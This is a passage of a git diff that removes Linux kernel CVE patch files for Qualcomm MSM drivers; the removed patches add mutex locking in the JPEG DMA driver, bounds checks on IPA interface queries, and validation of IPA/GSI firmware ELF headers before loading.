-@@ -849,6 +851,7 @@ static int msm_jpegdma_qbuf(struct file *file, void *fh,
- 		put_user(kp_buff.fd, &up_buff->fd) ||
- 		put_user(kp_buff.offset, &up_buff->offset)) {
- 		dev_err(ctx->jdma_device->dev, "Error putting user data\n");
-+		mutex_unlock(&ctx->lock);
- 		return -EFAULT;
- 	}
- 
-@@ -871,7 +874,7 @@ static int msm_jpegdma_qbuf(struct file *file, void *fh,
- 	ret = v4l2_m2m_qbuf(file, ctx->m2m_ctx, buf);
- 	if (ret < 0)
- 		dev_err(ctx->jdma_device->dev, "QBuf fail\n");
--
-+	mutex_unlock(&ctx->lock);
- 	return ret;
- }
- 
-@@ -1032,10 +1035,11 @@ static int msm_jpegdma_s_crop(struct file *file, void *fh,
- 	if (crop->c.height % formats[ctx->format_idx].v_align)
- 		return -EINVAL;
- 
-+	mutex_lock(&ctx->lock);
- 	ctx->crop = crop->c;
- 	if (atomic_read(&ctx->active))
- 		ret = msm_jpegdma_update_hw_config(ctx);
--
-+	mutex_unlock(&ctx->lock);
- 	return ret;
- }
- 
-@@ -1240,12 +1244,14 @@ void msm_jpegdma_isr_processing_done(struct msm_jpegdma_device *dma)
- 
- 	ctx = v4l2_m2m_get_curr_priv(dma->m2m_dev);
- 	if (ctx) {
-+		mutex_lock(&ctx->lock);
- 		ctx->plane_idx++;
- 		if (ctx->plane_idx >= formats[ctx->format_idx].num_planes) {
- 			src_buf = v4l2_m2m_src_buf_remove(ctx->m2m_ctx);
- 			dst_buf = v4l2_m2m_dst_buf_remove(ctx->m2m_ctx);
- 			if (src_buf == NULL || dst_buf == NULL) {
- 				dev_err(ctx->jdma_device->dev, "Error, buffer list empty\n");
-+				mutex_unlock(&ctx->lock);
- 				mutex_unlock(&dma->lock);
- 				return;
- 			}
-@@ -1261,11 +1267,13 @@ void msm_jpegdma_isr_processing_done(struct msm_jpegdma_device *dma)
- 			src_buf = v4l2_m2m_next_src_buf(ctx->m2m_ctx);
- 			if (src_buf == NULL || dst_buf == NULL) {
- 				dev_err(ctx->jdma_device->dev, "Error, buffer list empty\n");
-+				mutex_unlock(&ctx->lock);
- 				mutex_unlock(&dma->lock);
- 				return;
- 			}
- 			msm_jpegdma_process_buffers(ctx, src_buf, dst_buf);
- 		}
-+		mutex_unlock(&ctx->lock);
- 	}
- 	mutex_unlock(&dma->lock);
- }
-diff --git a/drivers/media/platform/msm/camera_v2/jpeg_dma/msm_jpeg_dma_dev.h b/drivers/media/platform/msm/camera_v2/jpeg_dma/msm_jpeg_dma_dev.h
-index 6a1205d..4911ce3 100644
---- a/drivers/media/platform/msm/camera_v2/jpeg_dma/msm_jpeg_dma_dev.h
-+++ b/drivers/media/platform/msm/camera_v2/jpeg_dma/msm_jpeg_dma_dev.h
-@@ -254,6 +254,7 @@ struct msm_jpegdma_buf_handle {
-  * @format_idx: Current format index.
-  */
- struct jpegdma_ctx {
-+	struct mutex lock;
- 	struct msm_jpegdma_device *jdma_device;
- 	atomic_t active;
- 	struct completion completion;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8236/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-8236/3.10/0001.patch
deleted file mode 100644
index 02c0d5af..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8236/3.10/0001.patch
+++ /dev/null
@@ -1,81 +0,0 @@
-From 8a079632f447be9fd86f92b8e02b1940a26c8a2a Mon Sep 17 00:00:00 2001
-From: Skylar Chang <chiaweic@codeaurora.org>
-Date: Wed, 1 Mar 2017 16:08:27 -0800
-Subject: msm: IPA: add the check on intf query
-
-The ipa_ioc_query_intf_rx_props structure comes
-from the ioctl handler, and it is verified that
-the size of rx buffer does not exceed the
-IPA_NUM_PROPS_MAX elements. It is also verified
-that the "entry->rx" buffer does not exceed
-IPA_NUM_PROPS_MAX when "entry" is allocated.
-However, the sizes of the buffer "rx->rx" and
-the buffer "entry->rx" are not guaranteed to
-be the same and will lead memory corruption
-issue. The fix is to add the check before
-memcpy.
-
-Change-Id: Idf5c2d32f47c1a1cffeaa5607193855188893ddb
-Signed-off-by: Skylar Chang <chiaweic@codeaurora.org>
----
- drivers/platform/msm/ipa/ipa_intf.c | 26 +++++++++++++++++++++++++-
- 1 file changed, 25 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/platform/msm/ipa/ipa_intf.c b/drivers/platform/msm/ipa/ipa_intf.c
-index 9a74107..18924a7 100644
---- a/drivers/platform/msm/ipa/ipa_intf.c
-+++ b/drivers/platform/msm/ipa/ipa_intf.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2013-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2013-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -275,6 +275,14 @@ int ipa_query_intf_tx_props(struct ipa_ioc_query_intf_tx_props *tx)
- 	mutex_lock(&ipa_ctx->lock);
- 	list_for_each_entry(entry, &ipa_ctx->intf_list, link) {
- 		if (!strncmp(entry->name, tx->name, IPA_RESOURCE_NAME_MAX)) {
-+			/* add the entry check */
-+			if (entry->num_tx_props != tx->num_tx_props) {
-+				IPAERR("invalid entry number(%u %u)\n",
-+					entry->num_tx_props,
-+						tx->num_tx_props);
-+				mutex_unlock(&ipa_ctx->lock);
-+				return result;
-+			}
- 			memcpy(tx->tx, entry->tx, entry->num_tx_props *
- 			       sizeof(struct ipa_ioc_tx_intf_prop));
- 			result = 0;
-@@ -308,6 +316,14 @@ int ipa_query_intf_rx_props(struct ipa_ioc_query_intf_rx_props *rx)
- 	mutex_lock(&ipa_ctx->lock);
- 	list_for_each_entry(entry, &ipa_ctx->intf_list, link) {
- 		if (!strncmp(entry->name, rx->name, IPA_RESOURCE_NAME_MAX)) {
-+			/* add the entry check */
-+			if (entry->num_rx_props != rx->num_rx_props) {
-+				IPAERR("invalid entry number(%u %u)\n",
-+					entry->num_rx_props,
-+						rx->num_rx_props);
-+				mutex_unlock(&ipa_ctx->lock);
-+				return result;
-+			}
- 			memcpy(rx->rx, entry->rx, entry->num_rx_props *
- 					sizeof(struct ipa_ioc_rx_intf_prop));
- 			result = 0;
-@@ -341,6 +357,14 @@ int ipa_query_intf_ext_props(struct ipa_ioc_query_intf_ext_props *ext)
- 	mutex_lock(&ipa_ctx->lock);
- 	list_for_each_entry(entry, &ipa_ctx->intf_list, link) {
- 		if (!strcmp(entry->name, ext->name)) {
-+			/* add the entry check */
-+			if (entry->num_ext_props != ext->num_ext_props) {
-+				IPAERR("invalid entry number(%u %u)\n",
-+					entry->num_ext_props,
-+						ext->num_ext_props);
-+				mutex_unlock(&ipa_ctx->lock);
-+				return result;
-+			}
- 			memcpy(ext->ext, entry->ext, entry->num_ext_props *
- 					sizeof(struct ipa_ioc_ext_intf_prop));
- 			result = 0;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8236/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2017-8236/3.18/0002.patch
deleted file mode 100644
index 362151cd..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8236/3.18/0002.patch
+++ /dev/null
@@ -1,147 +0,0 @@
-From cf0d31bc3b04cf2db7737d36b11a5bf50af0c1db Mon Sep 17 00:00:00 2001
-From: Skylar Chang <chiaweic@codeaurora.org>
-Date: Wed, 1 Mar 2017 16:08:27 -0800
-Subject: msm: IPA: add the check on intf query
-
-The ipa_ioc_query_intf_rx_props structure comes
-from the ioctl handler, and it is verified that
-the size of rx buffer does not exceed the
-IPA_NUM_PROPS_MAX elements. It is also verified
-that the "entry->rx" buffer does not exceed
-IPA_NUM_PROPS_MAX when "entry" is allocated.
-However, the sizes of the buffer "rx->rx" and
-the buffer "entry->rx" are not guaranteed to
-be the same and will lead memory corruption
-issue. The fix is to add the check before
-memcpy.
-
-Change-Id: Idf5c2d32f47c1a1cffeaa5607193855188893ddb
-Signed-off-by: Skylar Chang <chiaweic@codeaurora.org>
----
- drivers/platform/msm/ipa/ipa_v2/ipa_intf.c | 24 ++++++++++++++++++++++++
- drivers/platform/msm/ipa/ipa_v3/ipa_intf.c | 28 +++++++++++++++++++++++++---
- 2 files changed, 49 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/platform/msm/ipa/ipa_v2/ipa_intf.c b/drivers/platform/msm/ipa/ipa_v2/ipa_intf.c
-index e0f4dcf..f8f8fd1 100644
---- a/drivers/platform/msm/ipa/ipa_v2/ipa_intf.c
-+++ b/drivers/platform/msm/ipa/ipa_v2/ipa_intf.c
-@@ -272,6 +272,14 @@ int ipa_query_intf_tx_props(struct ipa_ioc_query_intf_tx_props *tx)
- 	mutex_lock(&ipa_ctx->lock);
- 	list_for_each_entry(entry, &ipa_ctx->intf_list, link) {
- 		if (!strncmp(entry->name, tx->name, IPA_RESOURCE_NAME_MAX)) {
-+			/* add the entry check */
-+			if (entry->num_tx_props != tx->num_tx_props) {
-+				IPAERR("invalid entry number(%u %u)\n",
-+					entry->num_tx_props,
-+						tx->num_tx_props);
-+				mutex_unlock(&ipa_ctx->lock);
-+				return result;
-+			}
- 			memcpy(tx->tx, entry->tx, entry->num_tx_props *
- 			       sizeof(struct ipa_ioc_tx_intf_prop));
- 			result = 0;
-@@ -305,6 +313,14 @@ int ipa_query_intf_rx_props(struct ipa_ioc_query_intf_rx_props *rx)
- 	mutex_lock(&ipa_ctx->lock);
- 	list_for_each_entry(entry, &ipa_ctx->intf_list, link) {
- 		if (!strncmp(entry->name, rx->name, IPA_RESOURCE_NAME_MAX)) {
-+			/* add the entry check */
-+			if (entry->num_rx_props != rx->num_rx_props) {
-+				IPAERR("invalid entry number(%u %u)\n",
-+					entry->num_rx_props,
-+						rx->num_rx_props);
-+				mutex_unlock(&ipa_ctx->lock);
-+				return result;
-+			}
- 			memcpy(rx->rx, entry->rx, entry->num_rx_props *
- 					sizeof(struct ipa_ioc_rx_intf_prop));
- 			result = 0;
-@@ -338,6 +354,14 @@ int ipa_query_intf_ext_props(struct ipa_ioc_query_intf_ext_props *ext)
- 	mutex_lock(&ipa_ctx->lock);
- 	list_for_each_entry(entry, &ipa_ctx->intf_list, link) {
- 		if (!strcmp(entry->name, ext->name)) {
-+			/* add the entry check */
-+			if (entry->num_ext_props != ext->num_ext_props) {
-+				IPAERR("invalid entry number(%u %u)\n",
-+					entry->num_ext_props,
-+						ext->num_ext_props);
-+				mutex_unlock(&ipa_ctx->lock);
-+				return result;
-+			}
- 			memcpy(ext->ext, entry->ext, entry->num_ext_props *
- 					sizeof(struct ipa_ioc_ext_intf_prop));
- 			result = 0;
-diff --git a/drivers/platform/msm/ipa/ipa_v3/ipa_intf.c b/drivers/platform/msm/ipa/ipa_v3/ipa_intf.c
-index b9f5755..067a58c 100644
---- a/drivers/platform/msm/ipa/ipa_v3/ipa_intf.c
-+++ b/drivers/platform/msm/ipa/ipa_v3/ipa_intf.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2013-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2013-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -275,6 +275,14 @@ int ipa3_query_intf_tx_props(struct ipa_ioc_query_intf_tx_props *tx)
- 	mutex_lock(&ipa3_ctx->lock);
- 	list_for_each_entry(entry, &ipa3_ctx->intf_list, link) {
- 		if (!strcmp(entry->name, tx->name)) {
-+			/* add the entry check */
-+			if (entry->num_tx_props != tx->num_tx_props) {
-+				IPAERR("invalid entry number(%u %u)\n",
-+					entry->num_tx_props,
-+						tx->num_tx_props);
-+				mutex_unlock(&ipa3_ctx->lock);
-+				return result;
-+			}
- 			memcpy(tx->tx, entry->tx, entry->num_tx_props *
- 			       sizeof(struct ipa_ioc_tx_intf_prop));
- 			result = 0;
-@@ -282,7 +290,6 @@ int ipa3_query_intf_tx_props(struct ipa_ioc_query_intf_tx_props *tx)
- 		}
- 	}
- 	mutex_unlock(&ipa3_ctx->lock);
--
- 	return result;
- }
- 
-@@ -314,6 +321,14 @@ int ipa3_query_intf_rx_props(struct ipa_ioc_query_intf_rx_props *rx)
- 	mutex_lock(&ipa3_ctx->lock);
- 	list_for_each_entry(entry, &ipa3_ctx->intf_list, link) {
- 		if (!strcmp(entry->name, rx->name)) {
-+			/* add the entry check */
-+			if (entry->num_rx_props != rx->num_rx_props) {
-+				IPAERR("invalid entry number(%u %u)\n",
-+					entry->num_rx_props,
-+						rx->num_rx_props);
-+				mutex_unlock(&ipa3_ctx->lock);
-+				return result;
-+			}
- 			memcpy(rx->rx, entry->rx, entry->num_rx_props *
- 					sizeof(struct ipa_ioc_rx_intf_prop));
- 			result = 0;
-@@ -321,7 +336,6 @@ int ipa3_query_intf_rx_props(struct ipa_ioc_query_intf_rx_props *rx)
- 		}
- 	}
- 	mutex_unlock(&ipa3_ctx->lock);
--
- 	return result;
- }
- 
-@@ -348,6 +362,14 @@ int ipa3_query_intf_ext_props(struct ipa_ioc_query_intf_ext_props *ext)
- 	mutex_lock(&ipa3_ctx->lock);
- 	list_for_each_entry(entry, &ipa3_ctx->intf_list, link) {
- 		if (!strcmp(entry->name, ext->name)) {
-+			/* add the entry check */
-+			if (entry->num_ext_props != ext->num_ext_props) {
-+				IPAERR("invalid entry number(%u %u)\n",
-+					entry->num_ext_props,
-+						ext->num_ext_props);
-+				mutex_unlock(&ipa3_ctx->lock);
-+				return result;
-+			}
- 			memcpy(ext->ext, entry->ext, entry->num_ext_props *
- 					sizeof(struct ipa_ioc_ext_intf_prop));
- 			result = 0;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8237/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-8237/ANY/0001.patch
deleted file mode 100644
index 60568bde..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8237/ANY/0001.patch
+++ /dev/null
@@ -1,476 +0,0 @@
-From 342d16ac6fb01e304ec75344c693257e00628ecf Mon Sep 17 00:00:00 2001
-From: Ghanim Fodi <gfodi@codeaurora.org>
-Date: Tue, 24 Jan 2017 15:42:30 +0200
-Subject: msm: ipa3: Validate IPA and GSI firmwares before loading
-
-IPA and GSI firmwares are saved on the file-system as an
-ELF file. IPA driver extracts the firmwares and load
-them during driver initialization.
-This change adds validation steps to each firmware before
-loading: load addresses, memory sizes, firmware sizes and
-more...
-
-Change-Id: I7d7f66e8e8a9ca0efae08b1e57b25ae4e44cc5bb
-CRs-fixed: 1110522
-Signed-off-by: Ghanim Fodi <gfodi@codeaurora.org>
----
- drivers/platform/msm/gsi/gsi.c                     |  10 ++
- drivers/platform/msm/gsi/gsi_reg.h                 |   4 +-
- drivers/platform/msm/ipa/ipa_v3/ipa.c              |   2 +-
- drivers/platform/msm/ipa/ipa_v3/ipa_i.h            |   2 +-
- drivers/platform/msm/ipa/ipa_v3/ipa_utils.c        | 187 +++++++++++++++------
- drivers/platform/msm/ipa/ipa_v3/ipahal/ipahal.c    |  18 +-
- drivers/platform/msm/ipa/ipa_v3/ipahal/ipahal.h    |  12 +-
- drivers/platform/msm/ipa/ipa_v3/ipahal/ipahal_i.h  |   6 +-
- .../platform/msm/ipa/ipa_v3/ipahal/ipahal_reg.c    |   6 +
- .../platform/msm/ipa/ipa_v3/ipahal/ipahal_reg.h    |   4 +-
- include/linux/msm_gsi.h                            |  21 ++-
- 11 files changed, 215 insertions(+), 57 deletions(-)
-
-diff --git a/drivers/platform/msm/gsi/gsi.c b/drivers/platform/msm/gsi/gsi.c
-index 24fdd61..a30d806 100644
---- a/drivers/platform/msm/gsi/gsi.c
-+++ b/drivers/platform/msm/gsi/gsi.c
-@@ -2742,6 +2742,16 @@ int gsi_enable_fw(phys_addr_t gsi_base_addr, u32 gsi_size, enum gsi_ver ver)
- }
- EXPORT_SYMBOL(gsi_enable_fw);
- 
-+void gsi_get_inst_ram_offset_and_size(unsigned long *base_offset,
-+		unsigned long *size)
-+{
-+	if (base_offset)
-+		*base_offset = GSI_GSI_INST_RAM_BASE_OFFS;
-+	if (size)
-+		*size = GSI_GSI_INST_RAM_SIZE;
-+}
-+EXPORT_SYMBOL(gsi_get_inst_ram_offset_and_size);
-+
- static int msm_gsi_probe(struct platform_device *pdev)
- {
- 	struct device *dev = &pdev->dev;
-diff --git a/drivers/platform/msm/gsi/gsi_reg.h b/drivers/platform/msm/gsi/gsi_reg.h
-index fa1e848..1acaf74 100644
---- a/drivers/platform/msm/gsi/gsi_reg.h
-+++ b/drivers/platform/msm/gsi/gsi_reg.h
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2015-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2015-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -1838,5 +1838,7 @@
- #define GSI_INTER_EE_n_SRC_EV_CH_IRQ_CLR_EV_CH_BIT_MAP_BMSK 0xffffffff
- #define GSI_INTER_EE_n_SRC_EV_CH_IRQ_CLR_EV_CH_BIT_MAP_SHFT 0x0
- 
-+#define GSI_GSI_INST_RAM_BASE_OFFS	0x4000
-+#define GSI_GSI_INST_RAM_SIZE		0x4000
- 
- #endif /* __GSI_REG_H__ */
-diff --git a/drivers/platform/msm/ipa/ipa_v3/ipa.c b/drivers/platform/msm/ipa/ipa_v3/ipa.c
-index aa83cbd..82887d05 100644
---- a/drivers/platform/msm/ipa/ipa_v3/ipa.c
-+++ b/drivers/platform/msm/ipa/ipa_v3/ipa.c
-@@ -4187,7 +4187,7 @@ static int ipa3_trigger_fw_loading_mdms(void)
- 
- 	IPADBG("FWs are available for loading\n");
- 
--	result = ipa3_load_fws(fw);
-+	result = ipa3_load_fws(fw, ipa3_res.transport_mem_base);
- 	if (result) {
- 		IPAERR("IPA FWs loading has failed\n");
- 		release_firmware(fw);
-diff --git a/drivers/platform/msm/ipa/ipa_v3/ipa_i.h b/drivers/platform/msm/ipa/ipa_v3/ipa_i.h
-index 3f19c21..fa6dd64 100644
---- a/drivers/platform/msm/ipa/ipa_v3/ipa_i.h
-+++ b/drivers/platform/msm/ipa/ipa_v3/ipa_i.h
-@@ -2015,7 +2015,7 @@ int ipa3_uc_panic_notifier(struct notifier_block *this,
- 	unsigned long event, void *ptr);
- void ipa3_inc_acquire_wakelock(void);
- void ipa3_dec_release_wakelock(void);
--int ipa3_load_fws(const struct firmware *firmware);
-+int ipa3_load_fws(const struct firmware *firmware, phys_addr_t gsi_mem_base);
- int ipa3_register_ipa_ready_cb(void (*ipa_ready_cb)(void *), void *user_data);
- const char *ipa_hw_error_str(enum ipa3_hw_errors err_type);
- int ipa_gsi_ch20_wa(void);
-diff --git a/drivers/platform/msm/ipa/ipa_v3/ipa_utils.c b/drivers/platform/msm/ipa/ipa_v3/ipa_utils.c
-index 7b7ae75..ba255a2 100644
---- a/drivers/platform/msm/ipa/ipa_v3/ipa_utils.c
-+++ b/drivers/platform/msm/ipa/ipa_v3/ipa_utils.c
-@@ -6107,75 +6107,164 @@ int ipa3_generate_eq_from_hw_rule(
- 	return 0;
- }
- 
-+static int ipa3_load_single_fw(const struct firmware *firmware,
-+	const struct elf32_phdr *phdr)
-+{
-+	uint32_t *fw_mem_base;
-+	int index;
-+	const uint32_t *elf_data_ptr;
-+
-+	if (phdr->p_offset > firmware->size) {
-+		IPAERR("Invalid ELF: offset=%u is beyond elf_size=%zu\n",
-+			phdr->p_offset, firmware->size);
-+		return -EINVAL;
-+	}
-+	if ((firmware->size - phdr->p_offset) < phdr->p_filesz) {
-+		IPAERR("Invalid ELF: offset=%u filesz=%u elf_size=%zu\n",
-+			phdr->p_offset, phdr->p_filesz, firmware->size);
-+		return -EINVAL;
-+	}
-+
-+	if (phdr->p_memsz % sizeof(uint32_t)) {
-+		IPAERR("FW mem size %u doesn't align to 32bit\n",
-+			phdr->p_memsz);
-+		return -EFAULT;
-+	}
-+
-+	if (phdr->p_filesz > phdr->p_memsz) {
-+		IPAERR("FW image too big src_size=%u dst_size=%u\n",
-+			phdr->p_filesz, phdr->p_memsz);
-+		return -EFAULT;
-+	}
-+
-+	fw_mem_base = ioremap(phdr->p_vaddr, phdr->p_memsz);
-+	if (!fw_mem_base) {
-+		IPAERR("Failed to map 0x%x for the size of %u\n",
-+			phdr->p_vaddr, phdr->p_memsz);
-+		return -ENOMEM;
-+	}
-+
-+	/* Set the entire region to 0s */
-+	memset(fw_mem_base, 0, phdr->p_memsz);
-+
-+	elf_data_ptr = (uint32_t *)(firmware->data + phdr->p_offset);
-+
-+	/* Write the FW */
-+	for (index = 0; index < phdr->p_filesz/sizeof(uint32_t); index++) {
-+		writel_relaxed(*elf_data_ptr, &fw_mem_base[index]);
-+		elf_data_ptr++;
-+	}
-+
-+	iounmap(fw_mem_base);
-+
-+	return 0;
-+}
-+
- /**
-  * ipa3_load_fws() - Load the IPAv3 FWs into IPA&GSI SRAM.
-  *
-  * @firmware: Structure which contains the FW data from the user space.
-+ * @gsi_mem_base: GSI base address
-  *
-  * Return value: 0 on success, negative otherwise
-  *
-  */
--int ipa3_load_fws(const struct firmware *firmware)
-+int ipa3_load_fws(const struct firmware *firmware, phys_addr_t gsi_mem_base)
- {
- 	const struct elf32_hdr *ehdr;
- 	const struct elf32_phdr *phdr;
--	const uint8_t *elf_phdr_ptr;
--	uint32_t *elf_data_ptr;
--	int phdr_idx, index;
--	uint32_t *fw_mem_base;
--
--	ehdr = (struct elf32_hdr *) firmware->data;
--
--	elf_phdr_ptr = firmware->data + sizeof(*ehdr);
-+	unsigned long gsi_iram_ofst;
-+	unsigned long gsi_iram_size;
-+	phys_addr_t ipa_reg_mem_base;
-+	u32 ipa_reg_ofst;
-+	int rc;
-+
-+	if (!gsi_mem_base) {
-+		IPAERR("Invalid GSI base address\n");
-+		return -EINVAL;
-+	}
- 
--	for (phdr_idx = 0; phdr_idx < ehdr->e_phnum; phdr_idx++) {
--		/*
--		 * The ELF program header will contain the starting
--		 * address to which the firmware needs to copied.
--		 */
--		phdr = (struct elf32_phdr *)elf_phdr_ptr;
-+	ipa_assert_on(!firmware);
-+	/* One program header per FW image: GSI, DPS and HPS */
-+	if (firmware->size < (sizeof(*ehdr) + 3 * sizeof(*phdr))) {
-+		IPAERR("Missing ELF and Program headers firmware size=%zu\n",
-+			firmware->size);
-+		return -EINVAL;
-+	}
- 
--		/*
--		 * p_vaddr will contain the starting address to which the
--		 * FW needs to be loaded.
--		 * p_memsz will contain the size of the IRAM.
--		 * p_filesz will contain the size of the FW image.
--		 */
--		fw_mem_base = ioremap(phdr->p_vaddr, phdr->p_memsz);
--		if (!fw_mem_base) {
--			IPAERR("Failed to map 0x%x for the size of %u\n",
--				phdr->p_vaddr, phdr->p_memsz);
--				return -ENOMEM;
--		}
-+	ehdr = (struct elf32_hdr *) firmware->data;
-+	ipa_assert_on(!ehdr);
-+	if (ehdr->e_phnum != 3) {
-+		IPAERR("Unexpected number of ELF program headers\n");
-+		return -EINVAL;
-+	}
-+	phdr = (struct elf32_phdr *)(firmware->data + sizeof(*ehdr));
- 
--		/* Set the entire region to 0s */
--		memset(fw_mem_base, 0, phdr->p_memsz);
-+	/*
-+	 * Each ELF program header represents a FW image and contains:
-+	 *  p_vaddr : The starting address to which the FW needs to loaded.
-+	 *  p_memsz : The size of the IRAM (where the image loaded)
-+	 *  p_filesz: The size of the FW image embedded inside the ELF
-+	 *  p_offset: Absolute offset to the image from the head of the ELF
-+	 */
- 
--		/*
--		 * p_offset will contain and absolute offset from the beginning
--		 * of the ELF file.
--		 */
--		elf_data_ptr = (uint32_t *)
--				((uint8_t *)firmware->data + phdr->p_offset);
-+	/* Load GSI FW image */
-+	gsi_get_inst_ram_offset_and_size(&gsi_iram_ofst, &gsi_iram_size);
-+	if (phdr->p_vaddr != (gsi_mem_base + gsi_iram_ofst)) {
-+		IPAERR(
-+			"Invalid GSI FW img load addr vaddr=0x%x gsi_mem_base=%pa gsi_iram_ofst=0x%lx\n"
-+			, phdr->p_vaddr, &gsi_mem_base, gsi_iram_ofst);
-+		return -EINVAL;
-+	}
-+	if (phdr->p_memsz > gsi_iram_size) {
-+		IPAERR("Invalid GSI FW img size memsz=%d gsi_iram_size=%lu\n",
-+			phdr->p_memsz, gsi_iram_size);
-+		return -EINVAL;
-+	}
-+	rc = ipa3_load_single_fw(firmware, phdr);
-+	if (rc)
-+		return rc;
- 
--		if (phdr->p_memsz % sizeof(uint32_t)) {
--			IPAERR("FW size %u doesn't align to 32bit\n",
--				phdr->p_memsz);
--			return -EFAULT;
--		}
-+	phdr++;
-+	ipa_reg_mem_base = ipa3_ctx->ipa_wrapper_base + ipahal_get_reg_base();
- 
--		/* Write the FW */
--		for (index = 0; index < phdr->p_filesz/sizeof(uint32_t);
--			index++) {
--			writel_relaxed(*elf_data_ptr, &fw_mem_base[index]);
--			elf_data_ptr++;
--		}
-+	/* Load IPA DPS FW image */
-+	ipa_reg_ofst = ipahal_get_reg_ofst(IPA_DPS_SEQUENCER_FIRST);
-+	if (phdr->p_vaddr != (ipa_reg_mem_base + ipa_reg_ofst)) {
-+		IPAERR(
-+			"Invalid IPA DPS img load addr vaddr=0x%x ipa_reg_mem_base=%pa ipa_reg_ofst=%u\n"
-+			, phdr->p_vaddr, &ipa_reg_mem_base, ipa_reg_ofst);
-+		return -EINVAL;
-+	}
-+	if (phdr->p_memsz > ipahal_get_dps_img_mem_size()) {
-+		IPAERR("Invalid IPA DPS img size memsz=%d dps_mem_size=%u\n",
-+			phdr->p_memsz, ipahal_get_dps_img_mem_size());
-+		return -EINVAL;
-+	}
-+	rc = ipa3_load_single_fw(firmware, phdr);
-+	if (rc)
-+		return rc;
- 
--		iounmap(fw_mem_base);
-+	phdr++;
- 
--		elf_phdr_ptr = elf_phdr_ptr + sizeof(*phdr);
-+	/* Load IPA HPS FW image */
-+	ipa_reg_ofst = ipahal_get_reg_ofst(IPA_HPS_SEQUENCER_FIRST);
-+	if (phdr->p_vaddr != (ipa_reg_mem_base + ipa_reg_ofst)) {
-+		IPAERR(
-+			"Invalid IPA HPS img load addr vaddr=0x%x ipa_reg_mem_base=%pa ipa_reg_ofst=%u\n"
-+			, phdr->p_vaddr, &ipa_reg_mem_base, ipa_reg_ofst);
-+		return -EINVAL;
-+	}
-+	if (phdr->p_memsz > ipahal_get_hps_img_mem_size()) {
-+		IPAERR("Invalid IPA HPS img size memsz=%d dps_mem_size=%u\n",
-+			phdr->p_memsz, ipahal_get_hps_img_mem_size());
-+		return -EINVAL;
- 	}
--	IPADBG("IPA FWs (GSI FW, HPS and DPS) were loaded\n");
-+	rc = ipa3_load_single_fw(firmware, phdr);
-+	if (rc)
-+		return rc;
-+
-+	IPADBG("IPA FWs (GSI FW, DPS and HPS) loaded successfully\n");
- 	return 0;
- }
- 
-diff --git a/drivers/platform/msm/ipa/ipa_v3/ipahal/ipahal.c b/drivers/platform/msm/ipa/ipa_v3/ipahal/ipahal.c
-index d023522..95a97ed 100644
---- a/drivers/platform/msm/ipa/ipa_v3/ipahal/ipahal.c
-+++ b/drivers/platform/msm/ipa/ipa_v3/ipahal/ipahal.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2016-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -1253,6 +1253,22 @@ int ipahal_get_proc_ctx_needed_len(enum ipa_hdr_proc_type type)
- 	return res;
- }
- 
-+/*
-+ * Get IPA Data Processing Star image memory size at IPA SRAM
-+ */
-+u32 ipahal_get_dps_img_mem_size(void)
-+{
-+	return IPA_HW_DPS_IMG_MEM_SIZE_V3_0;
-+}
-+
-+/*
-+ * Get IPA Header Processing Star image memory size at IPA SRAM
-+ */
-+u32 ipahal_get_hps_img_mem_size(void)
-+{
-+	return IPA_HW_HPS_IMG_MEM_SIZE_V3_0;
-+}
-+
- int ipahal_init(enum ipa_hw_type ipa_hw_type, void __iomem *base)
- {
- 	int result;
-diff --git a/drivers/platform/msm/ipa/ipa_v3/ipahal/ipahal.h b/drivers/platform/msm/ipa/ipa_v3/ipahal/ipahal.h
-index 00b2058..746bc30 100644
---- a/drivers/platform/msm/ipa/ipa_v3/ipahal/ipahal.h
-+++ b/drivers/platform/msm/ipa/ipa_v3/ipahal/ipahal.h
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2016-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -634,6 +634,16 @@ void ipahal_cp_proc_ctx_to_hw_buff(enum ipa_hdr_proc_type type,
-  */
- int ipahal_get_proc_ctx_needed_len(enum ipa_hdr_proc_type type);
- 
-+/*
-+ * Get IPA Data Processing Star image memory size at IPA SRAM
-+ */
-+u32 ipahal_get_dps_img_mem_size(void);
-+
-+/*
-+ * Get IPA Header Processing Star image memory size at IPA SRAM
-+ */
-+u32 ipahal_get_hps_img_mem_size(void);
-+
- int ipahal_init(enum ipa_hw_type ipa_hw_type, void __iomem *base);
- void ipahal_destroy(void);
- 
-diff --git a/drivers/platform/msm/ipa/ipa_v3/ipahal/ipahal_i.h b/drivers/platform/msm/ipa/ipa_v3/ipahal/ipahal_i.h
-index 6a22240..5f02b4df 100644
---- a/drivers/platform/msm/ipa/ipa_v3/ipahal/ipahal_i.h
-+++ b/drivers/platform/msm/ipa/ipa_v3/ipahal/ipahal_i.h
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2016, The Linux Foundation. All rights reserved.
